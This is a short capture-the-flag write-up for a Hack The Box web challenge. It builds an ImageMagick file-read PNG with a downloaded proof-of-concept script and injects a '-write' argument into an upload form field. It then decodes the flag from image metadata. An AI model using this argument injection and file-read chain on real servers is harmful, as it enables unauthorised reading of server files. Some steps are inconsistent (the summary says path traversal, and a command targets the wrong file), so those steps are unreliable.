https://app.hackthebox.com/challenges/459

Description

Welcome to the Prying Eyes, a “safe space” for those curious about the large organisations that dominate our life. How safe is the site really?

Exploitation

wget https://raw.githubusercontent.com/Sybil-Scan/imagemagick-lfi-poc/refs/heads/main/generate.py
python generate.py -f '/home/node/app/flag.txt' -o exploit.png

Register and login to create a new post with the file exploit.png. Then, using Burp Suite, intercept the request and replace the boundary 121759579010930786621073729912 with your custom boundary and add.

-----------------------------121759579010930786621073729912
Content-Disposition: form-data; name="blur"

1 -write uploads/hi.png ; echo

After the upload simply:

wget http://94.237.51.1:35160/uploads/hi.png
exiftool -b flag
echo "$(exiftool flag -b 2>/dev/null | grep -Eo '[0-9a-fA-F]{40,}')" | xxd -r -p

Summary

Prying Eyes: use path traversal to escape the intended read path and recover the flag.